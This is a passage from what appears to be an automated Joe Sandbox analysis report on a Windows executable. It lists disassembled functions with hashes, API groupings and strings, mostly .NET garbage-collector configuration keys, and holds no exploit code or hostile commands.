                            • Opcode Fuzzy Hash: 104b6b8d726536473a8dfb620195b120dc1c760eb9325624558afd6144496d8f
                            • Instruction Fuzzy Hash: 74F06D23D3C602D0E650AF1AF9C06B9A2B0EB453D4F9A8132D95D129A58E3CE851C320
                            Function 00007FF774A128F0 Relevance: 2.5, APIs: 2, Instructions: 17memoryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: 39155d9e0f21e472d4726bd40e7b7375b22274d9dbcec4a77f59ee3cc5932518
                            • Instruction ID: 45dc2d42ac9ebcddbfccb65da1d80603c84242f1b75c2749cd2bda5fa461818e
                            • Opcode Fuzzy Hash: 39155d9e0f21e472d4726bd40e7b7375b22274d9dbcec4a77f59ee3cc5932518
                            • Instruction Fuzzy Hash: 61E08C26F3A101C2FA18AB2BA882A3463A16F59B40FD4C038C60D42360DE2DA55A9B61
                            Function 00007FF774A1744E Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: BreakDebug
                            • String ID:
                            • API String ID: 456121617-0
                            • Opcode ID: 7460946a867b334da87abb833cff141128d26cc53670839ff519a9e4497aa03f
                            • Instruction ID: 23b52c86a66687c804a7279bafd17cd9ab0d133d65250b9c63589b777604943a
                            • Opcode Fuzzy Hash: 7460946a867b334da87abb833cff141128d26cc53670839ff519a9e4497aa03f
                            • Instruction Fuzzy Hash: C541D467F38642C2F650AE1394819B5A3B1AB887A4FA55632DA2E537C5DF3CE841C350
                            Function 00007FF774A05920 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: ExceptionFailFastQueryRaiseVirtual
                            • String ID:
                            • API String ID: 3307674043-0
                            • Opcode ID: 1eb33025fcb74d676cc7358ae85899384f83db43159bf41c0ac61a9e8579e1b9
                            • Instruction ID: 7b19148b4d21bfb2a41eec79118b93ee1d2584ffd94403d5c2ba0863fa9dcef8
                            • Opcode Fuzzy Hash: 1eb33025fcb74d676cc7358ae85899384f83db43159bf41c0ac61a9e8579e1b9
                            • Instruction Fuzzy Hash: 32118C73A28781D2DA24AF26B44459AB350FB447B4FA54339EABE477D6DF38D0028711
                            Function 00007FF774A129C0 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: FreeVirtual
                            • String ID:
                            • API String ID: 1263568516-0
                            • Opcode ID: 5bf7aecc9f77985d4fc3611f7f1d3a7e0808b60eb16f243669942d2759ca37ea
                            • Instruction ID: 8289d197f098e4313e8f31512eb71dc0e860f75ff3322d274be8838c1bdde109
                            • Opcode Fuzzy Hash: 5bf7aecc9f77985d4fc3611f7f1d3a7e0808b60eb16f243669942d2759ca37ea
                            • Instruction Fuzzy Hash: 3AB01200F3A001C2E3043B237CC2B3C13143F09B12FC40024C708A1360CE1C85E53B21

                            Non-executed Functions

                            Function 00007FF774A12C50 Relevance: 111.8, Strings: 89, Instructions: 525COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID:
                            • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$BreakOnOOM$CompactRatio$ConcurrentGC$ConfigLogEnabled$ConfigLogFile$ConservativeGC$ForceCompact$GCConfigLogFile$GCConserveMem$GCCpuGroup$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapAffinitizeRanges$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLargePages$GCLogFile$GCLowSkipRatio$GCName$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCWriteBarrier$Gen0Size$HeapCount$HeapVerifyLevel$LOHCompactionMode$LOHThreshold$LatencyLevel$LatencyMode$LogEnabled$LogFile$LogFileSize$NoAffinitize$RetainVM$SegmentSize$ServerGC$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.HeapAffinitizeMask$System.GC.HeapAffinitizeRanges$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.Name$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server
                            • API String ID: 0-658696054
                            • Opcode ID: ecde77bb0a1b3d580a77b2a7b2ab0705610edb5cdae39382ac81189c20de0c64
                            • Instruction ID: 3eb344a75424fd08a8f89dd1772a1d54f8b5f870c1a0e6c451281cd162493a4e
                            • Opcode Fuzzy Hash: ecde77bb0a1b3d580a77b2a7b2ab0705610edb5cdae39382ac81189c20de0c64
                            • Instruction Fuzzy Hash: 87325262638A5BD1EB20AF16F990A79A364FF597C8F815133D98C07B24EF7CD2018725
                            Function 00007FF774A13910 Relevance: 102.8, Strings: 82, Instructions: 270COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID:
                            • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$GCBreakOnOOM$GCCompactRatio$GCConfigLogEnabled$GCConserveMemory$GCCpuGroup$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapCount$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLOHCompact$GCLOHThreshold$GCLargePages$GCLatencyLevel$GCLatencyMode$GCLogEnabled$GCLogFileSize$GCLowSkipRatio$GCNoAffinitize$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCRetainVM$GCSegmentSize$GCTotalPhysicalMemory$GCWriteBarrier$GCgen0size$HeapVerify$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.HeapAffinitizeMask$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server$gcConcurrent$gcConservative$gcForceCompact$gcServer
                            • API String ID: 0-2080704861
                            • Opcode ID: 13c2ff06cb6ee55de0b396958020aa07f0a51e79af96dec23aaa6c9b6e43138c
                            • Instruction ID: f43eade4f6167e4a9710588418ac737832a414ba7b1c6419f0987b82154d3929
                            • Opcode Fuzzy Hash: 13c2ff06cb6ee55de0b396958020aa07f0a51e79af96dec23aaa6c9b6e43138c
                            • Instruction Fuzzy Hash: D9F18E62D79947E1F600FF67E9D58F4A7A6AF99304BC58033D00D520B6AE7CA249C371
                            Function 00007FF774A12A80 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81memoryCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
                            • String ID: SeLockMemoryPrivilege
                            • API String ID: 1752251271-475654710
                            • Opcode ID: ddb9acfd945d833e265492e35a954827198e86c4bc086900fbe4fb1499a4b753
                            • Instruction ID: 7f8f838ef297cb180895f80de2cab28762bc4370f13c414061a0172b33b06fd5
                            • Opcode Fuzzy Hash: ddb9acfd945d833e265492e35a954827198e86c4bc086900fbe4fb1499a4b753
                            • Instruction Fuzzy Hash: 2A318323A3DA42C6FB20AF62A88467AA7B1FF94B88F904035DA4D47764DF3CD4448760
                            Function 00007FF774A080B0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 248COMMON
                            Download Yara Rule
                            APIs
                            • RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF774A08A70,?,?,?,?,?,?,?,?,?), ref: 00007FF774A0813B
                            • RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF774A08A70,?,?,?,?,?,?,?,?,?), ref: 00007FF774A0829A
                            • RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF774A08A70,?,?,?,?,?,?,?,?,?), ref: 00007FF774A08390
                            • RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF774A08A70,?,?,?,?,?,?,?,?,?), ref: 00007FF774A083A6
                            • RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF774A08A70,?,?,?,?,?,?,?,?,?), ref: 00007FF774A08406
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: ExceptionFailFastRaise
                            • String ID: [ KeepUnwinding ]
                            • API String ID: 2546344036-400895726
                            • Opcode ID: ccef75ce2b4fd517aeb3d753c38118d6ca4b9bf99982452ca9f0cb54815e2628
                            • Instruction ID: 8a23f5dc53e932a040d31cd384a2287e2c31e225a5c1bbd881b2ee7cff7f1944
                            • Opcode Fuzzy Hash: ccef75ce2b4fd517aeb3d753c38118d6ca4b9bf99982452ca9f0cb54815e2628
                            • Instruction Fuzzy Hash: 92C18273A29B41C1EB549F36D4C4AA97360FB44B48FA9413ACE4D073A8EF39D455C324
                            Function 00007FF774A6955C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                            • String ID:
                            • API String ID: 2933794660-0
                            • Opcode ID: efb2c1910f7fe4eb1fdb9db6ef462f9c960acadc62b879df81811dfe8f91f112
                            • Instruction ID: b17159b3231ec46167350ff4bcef608543dcc3313e6615fa65b130ced16902d5
                            • Opcode Fuzzy Hash: efb2c1910f7fe4eb1fdb9db6ef462f9c960acadc62b879df81811dfe8f91f112
                            • Instruction Fuzzy Hash: D4114826B38B01CAEB00DF61EC942B873A4FB19B98F840A31DA6D827A4DF78D5548350
                            Function 00007FF774A05410 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 193COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            • The required instruction sets are not supported by the current CPU., xrefs: 00007FF774A0570E
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: ExceptionFailFastRaise
                            • String ID: The required instruction sets are not supported by the current CPU.
                            • API String ID: 2546344036-3318624164
                            • Opcode ID: ab07537777515488e9e8f57eef12ca18558389b5460dfc982353195e4352bf6a
                            • Instruction ID: acf963d2e536ad29e5ed09acc5f2e96c2b5af1f666d7adbaa269212f017bb8c0
                            • Opcode Fuzzy Hash: ab07537777515488e9e8f57eef12ca18558389b5460dfc982353195e4352bf6a
                            • Instruction Fuzzy Hash: C871B533A39136C6FF25AF2B94C9935E651AF11384FD64939D40987AA1EF2DB410CB21
                            Function 00007FF774A2DE20 Relevance: 2.0, APIs: 1, Instructions: 456COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: BreakCounterCreateDebugEventPerformanceQuery
                            • String ID:
                            • API String ID: 4239280443-0
                            • Opcode ID: 252cd89e4528406686be57cf00f60d5450300994312d88c791e533677183f503
                            • Instruction ID: 7e11cbe2fc307975061f38a8f6694187e18512c8050fd57b32620a6a6c901e88
                            • Opcode Fuzzy Hash: 252cd89e4528406686be57cf00f60d5450300994312d88c791e533677183f503
                            • Instruction Fuzzy Hash: 7E420C33D38B82D5E700EF26B8C0265B7A4FB59748F95923AD98C22765DF3CA091D361
                            Function 00007FF774A319F0 Relevance: 1.9, Strings: 1, Instructions: 621COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-3916222277
                            • Opcode ID: 3af64f1d3e18b5226ba85596036ff583db5a1ecd88759b32c0d3579c6f4f138e
                            • Instruction ID: 8c42a6e03b906a50fcab5616d7a30ff3cce33b6443dcc6bdd1a8577e418b6fbf
                            • Opcode Fuzzy Hash: 3af64f1d3e18b5226ba85596036ff583db5a1ecd88759b32c0d3579c6f4f138e
                            • Instruction Fuzzy Hash: 5B529133A39B82D5EB149F06E880679B3A1FB45798F954236DA6D43794EF3CE450C321
                            Function 00007FF774A1E4E0 Relevance: 1.7, Strings: 1, Instructions: 439COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID:
                            • String ID: ?
                            • API String ID: 0-1684325040
                            • Opcode ID: 1fe4063cd8a7627479a9be527d78d8baf63d271df9d58fc4a7a5da7ffb6242fc
                            • Instruction ID: dee22986f870838c1ceb39062dfd4053a385c5bb0fdda3284e72c50bdd402ce5
                            • Opcode Fuzzy Hash: 1fe4063cd8a7627479a9be527d78d8baf63d271df9d58fc4a7a5da7ffb6242fc
                            • Instruction Fuzzy Hash: 3B12C333A38A81C2EA10EF16E480A7AE3B5FB64B94FA54632DA5D47794DF3CE441C710
                            Function 00007FF774A328F0 Relevance: .9, Instructions: 945COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fbbfacb1d8f9f6609acfa47c3662894f093c3c4e861cb0b99195e5338392d3b5
                            • Instruction ID: 3813e2baabd15f9988b4be4c20b032b117a35e2a45ba54556b6885f924d4db3e
                            • Opcode Fuzzy Hash: fbbfacb1d8f9f6609acfa47c3662894f093c3c4e861cb0b99195e5338392d3b5
                            • Instruction Fuzzy Hash: E392D163E39B42D5EA01BF17A9D0AB4E395AF45BC8FA58136D80E53360EF3DE4458321
                            Function 00007FF774A337F0 Relevance: .6, Instructions: 626COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
